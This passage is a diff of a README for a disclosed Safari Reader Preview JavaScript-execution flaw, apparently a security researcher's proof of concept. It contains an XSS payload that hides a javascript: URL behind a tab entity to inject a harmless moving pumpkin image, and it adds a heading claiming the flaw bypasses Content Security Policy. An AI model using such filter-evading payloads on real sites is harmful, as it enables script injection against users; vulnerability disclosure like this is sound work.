5l1v3r1/Safari-Reader-Preview-Javascript-code-execution/README.md

 <a href="https://www.apple.com/">Source: Apple.com</a><br>
 <a href="jav&Tab;ascript:var p = document.createElement('p');p.innerHTML='<marquee scrollamount=25><img src=https://cdn.pixabay.com/photo/2017/10/26/20/00/pumpkin-2892303_1280.jpg height=400 width=400></marquee>';document.documentElement.appendChild(p)">Evil link</a><br>
 ```
-and it will create a annoying moving pumkin image on the screen as displayed in the below screenshot
+and it will create an annoying moving pumkin image on the screen as displayed in the below screenshot

 ![9](https://github.com/c0d3G33k/Safari-Reader-Preview-Javascript-code-execution/blob/master/Screenshot%20at%20Oct%2017%2016-54-35.png)

 Check the video proof of concept
 ![10](https://youtu.be/sd5dX-2a97E)

+### CSP Bypass

 This vulnerability will also be useful to bypass CSP checks in safari.
 You can imagine a situation when an attacker is able to inject XSS payload on a perfectly CSP implemented page eg:
 ```